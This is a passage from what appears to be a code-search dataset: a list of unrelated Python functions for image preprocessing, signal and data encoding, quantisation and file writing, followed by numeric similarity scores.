with tf.name_scope(\"add_pos_encoding\"):\n length = tf.shape(self.encoder_inputs)[1]\n pos_encoding = transformer_model_utils.get_position_encoding(\n length, self.options[\"hidden_size\"])\n encoder_inputs = self.encoder_inputs + pos_encoding\n\n if self.is_training:\n encoder_inputs = tf.nn.dropout(\n encoder_inputs, 1 - self.options[\"layer_postprocess_dropout\"])\n\n return self.encoder_stack(encoder_inputs, self.attention_bias, inputs_padding)", "def encode(self, signal: np.ndarray, threshold: float = None) -> np.ndarray:\n\n # Initializing the spike train to be an array of zeros with same number of timesteps as the signal.\n spikes = np.zeros(signal.shape, dtype=np.int8)\n\n # If threshold value is passed to the function, it is used. Otherwise threshold value passed during initalization is used.\n if threshold == None:\n threshold = self.threshold\n\n # Saving the first value of the signal for decode function.\n self.initial_val = signal[0].copy()\n\n # Initializing base to first value of the signal. 
.copy() used to avoid affecting the input signal.\n base = signal[0].copy()\n\n # Iterating over all timesteps\n for t in range(1, signal.size):\n\n # If signal value at time step t is greater than base+threshold, a positive spike is encoded.\n if signal[t] >= base + threshold:\n spikes[t] = 1\n base += threshold\n\n # If signal value at time step t is less than base-threshold, a negative spike is encoded.\n elif signal[t] <= base - threshold:\n spikes[t] = -1\n base -= threshold\n\n # Returns spike train\n return spikes", "def send_processd_for_prediction(self):\n resized_image = cv2.resize(self.processed_image, (28, 28))\n self.send_proccesd_image_to_ML.emit(resized_image)", "def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4):\n length = tf.shape(x)[1]\n channels = tf.shape(x)[2]\n signal = get_timing_signal_1d(\n length, channels, min_timescale, max_timescale)\n return x + signal", "def normalize_data_unit_interval(data):\n if data.dtype == 'float32':\n return\n return data.astype('float32') / 255.0", "def requantize(image, level_num=8):\n M, N = image.shape\n level_space = np.linspace(0, 255, level_num)\n out_img = np.zeros([M, N], dtype='uint8')\n for i in range(M):\n for j in range(N):\n out_img[i, j] = min(level_space, key=lambda x: abs(x - image[i, j]))\n\n return out_img.astype('uint8')", "def adjust_image_data(self):\r\n\r\n print('Adjusting image data: ')\r\n\r\n if self.removeFirstSequence: # used to remove the first trial from the sequence\r\n\r\n frames_per_rep = self.nFrames/self.nrepetitions\r\n\r\n self.imageData = self.imageData[frames_per_rep:, :, :]\r\n\r\n self.nFrames = self.imageData.shape[0]\r\n\r\n self.nrepetitions = int(self.nFrames/(self.period * self.framerate))\r\n\r\n self.times = np.arange(0, self.nFrames/self.framerate, 1.0/self.framerate)\r\n\r\n \r\n\r\n # first squeeze the image to 3d if it is 4d\r\n\r\n maxt = np.max(self.times) # find last image time\r\n\r\n sh = self.imageData.shape\r\n\r\n if len(sh) == 4:\r\n\r\n self.imageData = self.imageData.squeeze()\r\n\r\n sh = self.imageData.shape\r\n\r\n dt = np.mean(np.diff(self.times)) # get the mean dt\r\n\r\n n_Periods = int((maxt+dt)/self.period) # how many full periods in the image set - include the first?\r\n\r\n if self.nrepetitions > 0 and self.nrepetitions < n_Periods:\r\n\r\n n_Periods = self.nrepetitions\r\n\r\n n_PtsPerCycle = int(np.floor(self.period/dt)); # estimate image points in a stimulus cycle\r\n\r\n ndt = self.period/n_PtsPerCycle\r\n\r\n self.imageData = self.imageData[range(0, n_Periods*n_PtsPerCycle),:,:] # reduce to only what we need\r\n\r\n print (' Adjusted image info')\r\n\r\n print (\" # Periods: %d Pts/cycle: %d Cycle dt %8.4fs (%8.3fHz) Cycle: %7.4fs\" %(n_Periods, n_PtsPerCycle, ndt, 1.0/ndt, self.period))\r\n\r\n self.print_image_info()", "def _momentum_update_key_encoder(self):\n for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):\n param_k.data = param_k.data * self.m + param_q.data * (1. 
- self.m)", "def encode(data, encoder):\n # Get the list of hidden depths\n\thd = encoder.hidden_depths\n # Find the middle hidden layer\n\tmiddle_layer_index = (len(hd)-1)/2\n # Initialize empty container for the encoded data\n\tdata_encoded = np.zeros((data.shape[0],hd[middle_layer_index]))\n\tfor i, d_ in enumerate(data):\n # feed forward, get all the activations, and just keep\n # the middle layer, which is the encoding\n\t\tx, z_container, x_container = encoder.ff(d_,True,True)\n\t\tx_encoded = x_container[1+middle_layer_index]\n\t\tdata_encoded[i] = x_encoded\n\t#\n\treturn data_encoded", "def preprocess(self, data):\n (w,h,f) = self.rawinputformat()\n dt = numpy.dtype(numpy.uint8)\n nb = numpy.frombuffer(data,dt,-1,0)\n actual_stream_width = (w&1)+w # hack, rather get this from the app sink\n if(actual_stream_width != self.reqsize):\n nb = nb.reshape(h,actual_stream_width,3)\n nb = nb[0:h,0:w,0:3] # crop to network input size\n else:\n nb = nb.reshape((actual_stream_width,actual_stream_width,3))\n img = nb.astype('float32')\n #Preprocess image\n #for i in range(3):\n # img[:,:,i] = (img[:,:,i] - self.mean[i]) * self.std[i]\n #img = resize(img/255.0,(w,h),1)\n img = img/255.0\n print(img.shape)\n #print(img[0,0,:])\n return img.astype(numpy.float16)", "def forward(self, x):\n # Get results of encoder network\n q = self.encode_nn(x)\n\n return q", "def base_encoder(cls, data, data_mask, init_encoder, downsize_encoder, input_encoder):\n data = downsize_encoder(init_encoder(data))\n return input_encoder(data, data_mask)", "def encode(self, message: str) -> None:\n image = self._original_image.copy()\n width, height = image.size\n pixels = image.load()\n\n binary_string = self._str_to_binary_string(message + self._end_message)\n tribit_list = self._split(binary_string, 3)\n\n for x_pixel in range(width):\n for y_pixel in range(height):\n tribit = tribit_list.pop(0)\n rgb_binary = self._rgb_to_binary(pixels[x_pixel, y_pixel])\n new_pixel = self._write_to_lsb(tribit, rgb_binary)\n\n if len(new_pixel) < 3:\n new_pixel = self._complete_list(new_pixel, list(rgb_binary))\n\n pixels[x_pixel, y_pixel] = self._binary_to_rgb(*new_pixel)\n\n if not tribit_list:\n break\n else:\n continue\n break\n\n self._encoded_image = image", "def __resize_512p(input_data):\n rate = 1\n test_size=512\n if input_data['img'].shape[0] > input_data['img'].shape[1]:\n if True: # input_data['img'].shape[1] < 512:\n rate = test_size / input_data['img'].shape[1]\n seq = iaa.Sequential([\n iaa.Scale({'height': \"keep-aspect-ratio\", 'width': test_size}, 'cubic')\n ])\n input_data['img'] = seq.augment_image(input_data['img'])\n else:\n if True: # input_data['img'].shape[0] < 512:\n rate = test_size / input_data['img'].shape[0]\n seq = iaa.Sequential([\n iaa.Scale({'height': test_size, 'width': \"keep-aspect-ratio\"}, 'cubic')\n ])\n input_data['img'] = seq.augment_image(input_data['img'])\n\n if DataAugmentor._is_synthtext(input_data):\n input_data['contour'] = [[np.cast['int32'](contour * rate) for contour in contours] for contours in\n input_data['contour']]\n else:\n input_data['contour'] = [np.cast['int32'](contour * rate) for contour in input_data['contour']]\n input_data['center_point'] = [(np.cast['int32'](point[0] * rate),\n np.cast['int32'](point[1] * rate)) for point in input_data['center_point']]\n return input_data", "def preprocess(self, resized_inputs):\n return (2.0 / 255.0) * resized_inputs - 1.0", "def img_prep(img, shape=(128, 128)):\n # Resize\n img = resize_volume(img, (shape[0], shape[1]))\n\n img = 
numpy.multiply(255, _normalize(img)).astype(numpy.uint8)\n\n return img", "def embed_image_pred(image):\n image_pil2 = Image.fromarray((255 * image).astype('uint8'))\n #image_pil2 = image_pil.resize((256, 256))\n string_buf2 = StringIO.StringIO()\n image_pil2.save(string_buf2, format='png')\n data = string_buf2.getvalue().encode('base64').replace('\\n', '')\n return 'data:image/png;base64,' + data", "def small_image(self):\n pass", "def jpeg_quantize(block: np.ndarray, option: model.QTables):\n t = table[option]\n return deadzone_quantize(block, t)", "def kmeansQuantise(image, quantisation_levels=64):\n K = quantisation_levels\n N_ATTEMPTS = 10\n MAX_ITER = 300\n TOL = 0.0001\n\n km = KMeans(\n n_clusters=K, n_init=N_ATTEMPTS, max_iter=MAX_ITER, tol=TOL,\n n_jobs=-1\n )\n\n z = np.float32(image.reshape(-1, 3))\n\n labels = km.fit_predict(z)\n centres = km.cluster_centers_\n\n res = centres[labels]/(256/K)\n res = res.astype(np.uint8)\n image_q = res.reshape((IMG_RES_M, IMG_RES_N, 3))\n\n return image_q", "def fit(self, signal):\n self.signal = signal", "def _encode_value(value):\n # leave numbers alone\n if isinstance(value, (int, long, float)):\n return value\n\n # leave Nones alone (they turn into null in JSON)\n if value is None:\n return value\n\n # convert datetime to str\n if isinstance(value, datetime.datetime):\n # return, don't go through truncation\n return str(value)\n\n # represent image as base64-encoded bytes\n import binascii\n from graphlab.data_structures.image import Image\n if isinstance(value, Image):\n image_format = None\n if value._format_enum == 0:\n image_format = 'jpeg'\n elif value._format_enum == 1:\n image_format = 'png'\n elif value._format_enum == 2:\n image_format = 'raw'\n if image_format is not None:\n ret = {\n 'type': 'image',\n 'width': value._width,\n 'height': value._height,\n 'channels': value._channels,\n 'format': image_format,\n 'id': id(value)\n }\n if image_format in ('jpeg', 'png'):\n ret.update({\n 'value': 'image/%s;base64,%s' % (image_format, binascii.b2a_base64(value._image_data))\n })\n elif image_format == 'raw':\n ret.update({\n 'value': list(value._image_data)\n })\n return ret\n\n # fallback case for images the browser does not know how to display\n # just convert to str and treat like any other type\n value = str(value)\n\n # convert strings to unicode (assumes utf-8 encoding, replaces invalid\n # characters with ?\n if isinstance(value, str) and sys.version_info.major == 2:\n value = unicode(value, encoding='utf-8', errors='replace')\n\n # get the array into a list so it is JSON serializable\n if isinstance(value, array.array):\n value = value.tolist()\n\n # truncate to 10 elements first\n if isinstance(value, (array.array, list)):\n value = value[:10]\n elif isinstance(value, dict):\n keys = value.keys()[:10]\n truncated = {}\n for key in keys:\n truncated[key] = value[key]\n value = truncated\n\n # get dict/list values properly encoded inside before dumping to str\n if isinstance(value, list):\n value = [_encode_value(v) for v in value]\n elif isinstance(value, dict):\n value = {_encode_value(k): _encode_value(v) for (k,v) in six.iteritems(value)}\n\n # json serialize dict/list types to convert to string\n if isinstance(value, (dict, list)):\n value = _to_json(value)\n\n # truncate via textwrap (will break on word boundaries if possible)\n wrapped = textwrap.wrap(value, 18)\n if len(wrapped) == 0:\n return ''\n\n return '%s%s' % (\n wrapped[0],\n '' if len(wrapped) == 1 else ' ...'\n )", "def quantise(images, q_levels):\n return 
(np.digitize(images, np.arange(q_levels) / q_levels) - 1).astype('float32')", "def quantise(images, q_levels):\n return (np.digitize(images, np.arange(q_levels) / q_levels) - 1).astype('float32')", "def quantise(images, q_levels):\n return (np.digitize(images, np.arange(q_levels) / q_levels) - 1).astype('float32')", "def __init__(self):\n super(BaseRNNEncoder, self).__init__()", "def convert_for_MaskRCNN(self, input_img):\r\n if input_img.shape[0] > 1024 or input_img.shape[1] > 1024:\r\n resized_img = resize(input_img,[1024,1024],preserve_range=True).astype(input_img.dtype)\r\n \r\n minval = np.min(resized_img)\r\n maxval = np.max(resized_img)\r\n \r\n return ((resized_img-minval)/(maxval-minval)*255).astype(np.uint8)", "def resize_128(img): \n return cv2.resize(img,(128,128))", "def make_big_e(self):\n l = self.l_i\n self.img[l/2-1:l/2+1, l/2-5:l/2+5] = 1\n self.img[l/2-5:l/2-3, l/2-5:l/2+5] = 1\n self.img[l/2+3:l/2+5, l/2-5:l/2+5] = 1\n self.img[l/2-5:l/2+5, l/2-5:l/2-3] = 1\n self.img_name = 'bigE'", "def rivine_binary_encode(self, encoder):\n pass", "def normalize(\n self,\n image: np.ndarray,\n data_format: Optional[Union[str, ChannelDimension]] = None,\n input_data_format: Optional[Union[str, ChannelDimension]] = None,\n ) -> np.ndarray:\n image = rescale(image=image, scale=1 / 127.5, data_format=data_format, input_data_format=input_data_format)\n image = image - 1\n return image", "def prepare(dataset):\n dataset = dataset.reshape(dataset.shape[0], 1, 28, 28)\n dataset = dataset.astype('float32')\n dataset /= 255\n return dataset", "def preparing_tocut(image):\n\n _, image = threshold_image(image)\n\n return image", "def _preprocess_image(self, image_raw):\n\n image = tf.io.decode_raw(image_raw, tf.float64)\n\n return image * self.rescale", "def write(self, image, **kwargs):\n\n if self.img is None:\n raise IOError(\"No data found for current image, load data first\")\n\n if self.img.timestamp is None:\n raise IOError(\"No time stamp found for current image.\")\n\n lons = np.unique(self.img.lon.flatten())\n lats = np.flipud(np.unique(self.img.lat.flatten()))\n\n mode = 'w' if not os.path.isfile(image) else 'a'\n ds = Dataset(image, mode=mode, **kwargs)\n\n ds.set_auto_scale(True)\n ds.set_auto_mask(True)\n\n units = 'Days since 2000-01-01 00:00:00'\n\n if mode == 'w':\n ds.createDimension('timestamp', None) # stack dim\n ds.createDimension('lat', len(lats))\n ds.createDimension('lon', len(lons))\n\n # this is not the obs time, but an image time stamp\n ds.createVariable('timestamp', datatype=np.double, dimensions=('timestamp',),\n zlib=True, chunksizes=None)\n ds.createVariable('lat', datatype='float64', dimensions=('lat',), zlib=True)\n ds.createVariable('lon', datatype='float64', dimensions=('lon',), zlib=True)\n\n ds.variables['timestamp'].setncatts({'long_name': 'timestamp',\n 'units': units})\n ds.variables['lat'].setncatts({'long_name': 'latitude', 'units': 'Degrees_North',\n 'valid_range': (-90, 90)})\n ds.variables['lon'].setncatts({'long_name': 'longitude', 'units': 'Degrees_East',\n 'valid_range': (-180, 180)})\n\n ds.variables['lon'][:] = lons\n ds.variables['lat'][:] = lats\n ds.variables['timestamp'][:] = np.array([])\n\n this_global_attrs = \\\n OrderedDict([('subset_img_creation_time', str(datetime.now())),\n ('subset_img_bbox_corners_latlon', str(self.grid.bbox)),\n ('subset_software', f\"{dist_name} | {subdist_name} | {__version__}\")])\n glob_attrs = self.glob_attrs\n for k in ['ease_global', 'history', 'creation_time', 'NCO']:\n try:\n glob_attrs.pop(k)\n except 
KeyError:\n continue\n glob_attrs.update(this_global_attrs)\n ds.setncatts(glob_attrs)\n\n idx = ds.variables['timestamp'].shape[0]\n ds.variables['timestamp'][idx] = date2num(self.img.timestamp, units=units)\n\n for var, vardata in self.img.data.items():\n\n if var not in ds.variables.keys():\n ds.createVariable(var, vardata.dtype, dimensions=('timestamp', 'lat', 'lon'),\n zlib=True, complevel=6)\n ds.variables[var].setncatts(self.img.metadata[var])\n\n ds.variables[var][-1] = vardata\n\n ds.close()", "def value(self, data, image=None):\n raise NotImplementedError", "def scaleLandsat(self,img):\n\t\tthermal = img.select(ee.List(['thermal'])).multiply(0.1)\n\t\tscaled = ee.Image(img).select(self.env.divideBands).multiply(ee.Number(0.0001))\n\t\t\n\t\treturn img.select([]).addBands(scaled).addBands(thermal)", "def preprocess(self, frame: np.ndarray) -> torch.TensorType:\n tensor = cv.resize(frame, (self.IMGSZ, self.IMGSZ)) \n tensor = tensor.transpose(2, 0, 1)\n tensor = torch.from_numpy(tensor)\n tensor = torch.unsqueeze(tensor, 0)\n tensor = tensor.half() if self.half else tensor.float()\n tensor = tensor / 255.0\n tensor = tensor.to(self.device)\n\n return tensor", "def encode(self) :\n\t\tbitmap = ISO8583Bitmap()\n\t\ttexts=[]\n\t\tfor i in range(2,129) :\n\t\t\tid = 'f%03d' % i\n\t\t\tif hasattr(self,id) :\n\t\t\t\tv = getattr(self,id)\n\t\t\t\ttyp = self.desc_dict[id]['type']\n\t\t\t\tbitmap.setBitmap(i)\n\t\t\t\t# logit(\"%s:%s\" % (id,v))\n\t\t\t\ttxt = dataAttachTo8583(v,typ)\n\t\t\t\ttexts.append(txt)\n\t\treturn (bitmap,''.join(texts))", "def _fit_encoder(self, frame, prop, encoder_type=\"category\"):\n pass", "def quantization_error(self, in_tensor, bits=32):\n raise NotImplementedError('To be Overidden for derived class')", "def upsample(self, method):\n from scipy.signal import resample\n from scipy.ndimage.interpolation import zoom\n #print \"mm: 100 x 100 x 131\"\n #print \"Dims:\", self.D.shape\n fact = np.array(self.info.shape).astype(\"float32\") / np.array(self.info.read_shape).astype(\"float32\")+0.00001 # hrmpf!!\n if method == \"zoom\":\n print \"Resampling...\"\n self.D = zoom(self.D, fact).astype(\"float32\")\n elif method == \"resample\":\n print \"Resampling...\"\n a = self.info.resample_ax\n s = self.info.shape[a]\n self.D = resample(self.D, s, axis=a, window=10).astype(\"float32\")\n elif method == None:\n pass\n else:\n raise NotImplementedError(\"Unknown upsampling method: %s\" % method)\n #print \"Dims:\", self.D.shape\n print \"done.\"" ]
[ "0.5878991", "0.58486336", "0.5828887", "0.57244307", "0.56981575", "0.54445195", "0.5440825", "0.5357206", "0.53013325", "0.5262915", "0.5184929", "0.5019855", "0.5011705", "0.49735066", "0.49495837", "0.49373123", "0.49359372", "0.4922893", "0.49128926", "0.49051914", "0.4884795", "0.48826027", "0.48787814", "0.48632252", "0.48571002", "0.48559126", "0.48408574", "0.48230052", "0.4814351", "0.4813384", "0.4812437", "0.48026094", "0.47944146", "0.4790053", "0.47900224", "0.47869408", "0.4772545", "0.47573578", "0.47396287", "0.47369927", "0.47369558", "0.47362232", "0.4720382", "0.47142673", "0.47119185", "0.4710888", "0.47093257", "0.47025663", "0.4686035", "0.46820965", "0.46711147", "0.4670181", "0.4670046", "0.4659068", "0.46559787", "0.46510088", "0.46430677", "0.4641861", "0.46357322", "0.46346167", "0.46341708", "0.4631191", "0.46309033", "0.4628997", "0.46270263", "0.4625135", "0.46245056", "0.4624419", "0.46242517", "0.46214533", "0.46191633", "0.46181077", "0.461153", "0.46079645", "0.4606172", "0.45897135", "0.45847815", "0.4584322", "0.45807087", "0.4574992", "0.4574265", "0.45741445", "0.45741445", "0.45741445", "0.45655367", "0.4562134", "0.45574203", "0.45562935", "0.45523953", "0.4548068", "0.45381775", "0.45329788", "0.4532044", "0.45309243", "0.45283052", "0.45269227", "0.45256108", "0.45220596", "0.45164102", "0.45163625", "0.4514619" ]
0.0
-1
Detects labels given a GCS path.
def main(path): video_client = (video_intelligence_service_client. VideoIntelligenceServiceClient()) features = [enums.Feature.LABEL_DETECTION] video_context = video_intelligence_pb2.VideoContext() video_context.stationary_camera = True video_context.label_detection_mode = video_intelligence_pb2.FRAME_MODE operation = video_client.annotate_video(path, features, video_context=video_context) print('\nProcessing video for label annotations:') while not operation.done(): sys.stdout.write('.') sys.stdout.flush() time.sleep(10) print('\nFinished processing.') results = operation.result().annotation_results[0] return(results)
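A minimal usage sketch for the `main(path)` document above, assuming it lives in a module that already holds the v1beta1 Video Intelligence imports it references (`video_intelligence_service_client`, `enums`, `video_intelligence_pb2`, `sys`, `time`); the `gs://` example URI and the `label_annotations`/`description` fields are assumptions drawn from that API generation, not part of the original record.

import argparse

# Assumed to be available in the module that defines main(path) above;
# these v1beta1 import paths are an assumption, not taken from the record:
# from google.cloud.gapic.videointelligence.v1beta1 import enums
# from google.cloud.gapic.videointelligence.v1beta1 import video_intelligence_service_client
# from google.cloud.proto.videointelligence.v1beta1 import video_intelligence_pb2

if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='Detect labels in a video stored on Google Cloud Storage.')
    # Hypothetical example path; any gs:// URI readable by the service should work.
    parser.add_argument('gcs_path', help='e.g. gs://my-bucket/my-video.mp4')
    args = parser.parse_args()

    # Blocks, polling every 10 seconds, until the annotation operation finishes.
    results = main(args.gcs_path)

    # Assumption: a v1beta1 annotation result exposes frame-level labels as
    # `label_annotations`, each carrying a human-readable `description`.
    for label in results.label_annotations:
        print(label.description)

Note that because main() sleeps 10 seconds between operation.done() checks, the call can take minutes for longer videos.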
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def detect_labels(path):\n client = vision.ImageAnnotatorClient()\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n response = client.label_detection(image=image)\n labels = response.label_annotations\n print('Labels:')\n return response", "def detect_labels(path):\n client = vision.ImageAnnotatorClient()\n\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.types.Image(content=content)\n\n response = client.label_detection(image=image)\n labels = response.label_annotations\n #print('Labels:')\n\n #for label in labels:\n # print(label.description)\n return labels", "def detect_labels(path):\n from google.cloud import vision\n client = vision.ImageAnnotatorClient()\n\n # [START vision_python_migration_label_detection]\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.types.Image(content=content)\n\n response = client.label_detection(image=image)\n labels = response.label_annotations\n ss=labels[0].description \n ss.split('/')[0]\n os.system(\"./ILOVEAPPLE/sort {} {}\".format(ss, path))\n # [END vision_python_migration_label_detection]", "def validate_labels(labels, path):\n for labels_ in labels.values():\n for label in labels_:\n for ann in label['annotations']:\n assert len(ann['segmentation']) == 1\n assert len(ann['segmentation'][0]) % 2 == 0\n\n label['annotations'] = [\n ann\n for ann in label['annotations']\n if len(ann['segmentation'][0]) >= 6\n ]\n assert len(label['annotations']) > 0\n label['file_name'] = path + '/' + label['file_name']\n\n for k in labels:\n labels[k] = [\n label for label in labels[k]\n if os.path.exists(label['file_name'])\n ]\n return labels", "def load_labels(path, kmer=True, rg=True, clip=True, rna=True, go=True):\n\n labels = dict()\n if go: labels[\"X_GO\"] = gzip.open(os.path.join(path,\n \"matrix_GeneOntology.tab.gz\")).readline().split(\"\\t\")\n if kmer: labels[\"X_KMER\"] = gzip.open(os.path.join(path,\n \"matrix_RNAkmers.tab.gz\")).readline().split(\"\\t\")\n if rg: labels[\"X_RG\"] = gzip.open(os.path.join(path,\n \"matrix_RegionType.tab.gz\")).readline().split(\"\\t\")\n if clip: labels[\"X_CLIP\"] = gzip.open(os.path.join(path,\n \"matrix_Cobinding.tab.gz\")).readline().split(\"\\t\")\n if rna: labels[\"X_RNA\"] = gzip.open(os.path.join(path,\n \"matrix_RNAfold.tab.gz\")).readline().split(\"\\t\")\n return labels", "def load_labels(self, pathLabel):\n self.pathLabel = pathLabel\n self.labelList = os.listdir(pathLabel)", "def load_label(path: str) -> dict:\n if not os.path.exists(path):\n print(f\"Warning, try to load non-exist label {path}\")\n return None\n return np.load(path, allow_pickle=True).tolist()", "def _load_labels(self, label_path: str) -> List[str]:\n with open(label_path, 'r') as f:\n return [line.strip() for _, line in enumerate(f.readlines())]", "def load_labels(path):\n with open(path, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n labels = {}\n for row_number, content in enumerate(lines):\n pair = re.split(r'[:\\s]+', content.strip(), maxsplit=1)\n if len(pair) == 2 and pair[0].strip().isdigit():\n labels[int(pair[0])] = pair[1].strip()\n else:\n labels[row_number] = pair[0].strip()\n return labels", "def get_image_path_label(all_paths):\r\n n_folders_int = random.sample(range(0, len(all_paths)), n_way)\r\n image_labels = [[(glob.glob(all_paths[n] + '\\*')[k], n) # (path, label)\r\n for n in n_folders_int\r\n for k in random.sample(range(0, len(glob.glob(all_paths[n] + 
'\\*'))), k_shot+1)\r\n ] for b in range(batch_size)] \r\n return image_labels", "def vision_api_label_detection(uri):\n\n\tpayload = {\n\t\t\"requests\": [\n\t\t\t{\n\t\t\t\t\"image\": {\n\t\t\t\t\t\"source\": {\n\t\t\t\t\t\t\"image_uri\": uri\n\t\t\t\t\t}\n\t\t\t\t},\n\t\t\t\t\"features\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"type\": \"LABEL_DETECTION\"\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t]\n\t}\n\n\tresponse = fetch(\n\t\t\"https://vision.googleapis.com/v1/images:annotate?key=\" + api_key,\n\t\tmethod=POST,\n\t\tpayload=dumps(payload),\n\t\theaders={\"Content-Type\": \"application/json\"}\n\t)\n\tresult = loads(response.content)\n\n\t#return len(result[\"responses\"][0])\n\n\tif (len(result[\"responses\"][0]) == 0):\n\t\treturn []\n\telse:\n\t\ttry:\n\t\t\ttop_5_labels = []\n\t\t\ti = 0\n\t\t\tfor label in result[\"responses\"][0][\"labelAnnotations\"]:\n\t\t\t\ttop_5_labels.append(label[\"description\"])\n\t\t\t\ti += 1\n\t\t\t\tif (i == 5):\n\t\t\t\t\tbreak\n\t\t\treturn set(top_5_labels)\n\t\texcept:\n\t\t\treturn []", "def detect_labels_uri(uri):\n client = vision.ImageAnnotatorClient()\n image = types.Image()\n image.source.image_uri = uri\n macy_keywords = []\n #print(dir(client))\n response_label = client.label_detection(image=image)\n response_web = client.web_detection(image=image)\n labels = response_label.label_annotations\n web_annotations = response_web.web_detection\n\n #print(dir(response_web))\n #print((dir(labels)))\n print('Labels:')\n\n for label in labels:\n print (label.description)\n if label.description in clw:\n print(label)\n macy_keywords.append(label.description)\n #for annotation in web_annotations():\n #print (annotation)\n\n for web_entity in web_annotations.web_entities:\n print (web_entity.description)\n if any(word in web_entity.description.lower() for word in clw):\n print(web_entity)\n macy_keywords.append(web_entity.description.lower())\n\n print set(macy_keywords)\n get_macy_links(set(macy_keywords))", "def _FindLabels(self):\n texs = \" \".join(glob.glob(\"*.tex\"))\n cat_process = subprocess.Popen(shlex.split(\"cat %s\" % texs),\n stdout=subprocess.PIPE)\n grep_process = subprocess.Popen(shlex.split(r\"grep \\\\\\\\label\"),\n stdin=cat_process.stdout,\n stdout=subprocess.PIPE)\n cat_process.stdout.close()\n\n lines = grep_process.communicate()[0]\n\n ret = []\n for label in lines.split(\"\\n\"):\n ret.append(responses.BuildCompletionData(\n re.sub(r\".*\\label{(.*)}.*\", r\"\\1\", label)\n )\n )\n\n return ret", "def identify(self, scores, word_seq, path):\n n = len(word_seq) - 1\n (prob, state) = max((scores[n][label], label) for label in self.label_type_map)\n return path[state]", "def _AreLabelsPaths(self):\n\n return self.label_class == \"file_label.FileLabel\"", "def read_label_from_txt(label_path):\n text = np.fromfile(label_path)\n bounding_box = []\n with open(label_path, \"r\") as f:\n labels = f.read().split(\"\\n\")\n for label in labels:\n if not label:\n continue\n label = label.split(\" \")\n if (label[0] == \"DontCare\"):\n continue\n\n if label[0] == (\"Car\" or \"Van\"): # or \"Truck\"\n bounding_box.append(label[8:15])\n\n if bounding_box:\n data = np.array(bounding_box, dtype=np.float32)\n return data[:, 3:6], data[:, :3], data[:, 6]\n else:\n return None, None, None", "def read_label_from_txt(label_path):\n text = np.fromfile(label_path)\n bounding_box = []\n with open(label_path, \"r\") as f:\n labels = f.read().split(\"\\n\")\n for label in labels:\n if not label:\n continue\n label = label.split(\" \")\n if (label[0] == 
\"DontCare\"):\n continue\n\n if label[0] == (\"Car\" or \"Van\"): # or \"Truck\"\n bounding_box.append(label[8:15])\n\n if bounding_box:\n data = np.array(bounding_box, dtype=np.float32)\n return data[:, 3:6], data[:, :3], data[:, 6]\n else:\n return None, None, None", "def load_labels(path):\n with open(path, \"r\", encoding=\"utf-8\") as f:\n lines = f.readlines()\n labels = {}\n for row_number, content in enumerate(lines):\n pair = re.split(r\"[:\\s]+\", content.strip(), maxsplit=1)\n if len(pair) == 2 and pair[0].strip().isdigit():\n labels[int(pair[0])] = pair[1].strip()\n else:\n labels[row_number] = pair[0].strip()\n # print(labels)\n return labels", "def compute_labels(path_list):\n labels = []\n videos = []\n for i, path in enumerate(path_list):\n X = read_labels(path)\n for sample in X:\n labels.append(sample[1])\n if i == 0:\n videos.append(sample[0])\n\n labels = np.array(labels).reshape(len(path_list), -1).T\n \n labels_avg = np.average(labels, 1).round()\n labels_med = np.median(labels, 1)\n return labels_med, labels_avg, videos", "def get_output(path, label_file = None):\n img_id = path.split('/')[-1]\n labels = label_file.loc[img_id].values\n return labels", "def load_imgsLabels(self, image_paths):\n \n# label = image_paths[-1]\n \n images = self.load_images(image_paths)\n \n images = self.resize_images(images)\n \n images_list = self.greyscale_images(images)\n\n return images_list", "def load_labels():\n filename = os.path.join(config['inference']['model_dir'], 'output_labels.txt')\n global labels\n labels = [line.rstrip() for line in tf.gfile.FastGFile(filename)]", "def get_labels():\n return if_found(dao.get_labels())", "def _get_img_label(self, path):\n food_items = self.annotations[path]\n tomato_items = [\n item for item in food_items\n if item['id'] in self.tomato_label_ids\n ]\n return 1 if len(tomato_items) > 0 else 0", "def load_from_path(self, paths, label_key='labels'):\n data = []\n labels = []\n for path in paths:\n with tf.io.gfile.GFile(path, 'rb') as f:\n d = {\n k.decode('utf8'): v\n for k, v in cPickle.load(f, encoding='bytes').items()\n }\n data.append(d['data'])\n labels.append(d[label_key])\n data = np.concatenate(data, axis=0)\n data = data.reshape((data.shape[0], 3, 32, 32))\n labels = np.concatenate(labels, axis=0)\n labels = np.reshape(labels, (len(labels), 1))\n\n if tf.keras.backend.image_data_format() == 'channels_last':\n data = data.transpose(0, 2, 3, 1)\n\n return data, labels", "def read_label_map(path):\n with tf.io.gfile.GFile(path) as f:\n if path.endswith('.json'):\n return json.load(f)\n else:\n label_map = {}\n empty_line_encountered = False\n for tag in f:\n tag = tag.strip()\n if tag:\n label_map[tag] = len(label_map)\n else:\n if empty_line_encountered:\n raise ValueError(\n 'There should be no empty lines in the middle of the label map '\n 'file.'\n )\n empty_line_encountered = True\n return label_map", "def classifyFile(self, path):\n # Gets extension of file from path\n name, ext = filename, file_extension = os.path.splitext(path)\n fileName = os.path.basename(path)\n\n # Look for all keywords in path\n for classification in self.outPaths:\n keywords = self.outPaths[classification][\"keywords\"]\n if [ele for ele in keywords if(ele in fileName)]:\n return (classification)\n#\n\n # Look for all extension patterns in path\n for classification in self.outPaths:\n if (ext in [x.replace(\"*\", \"\") for x in self.outPaths[classification][\"pattern\"]]):\n # Return classification if found\n return (classification)\n\n # If no 
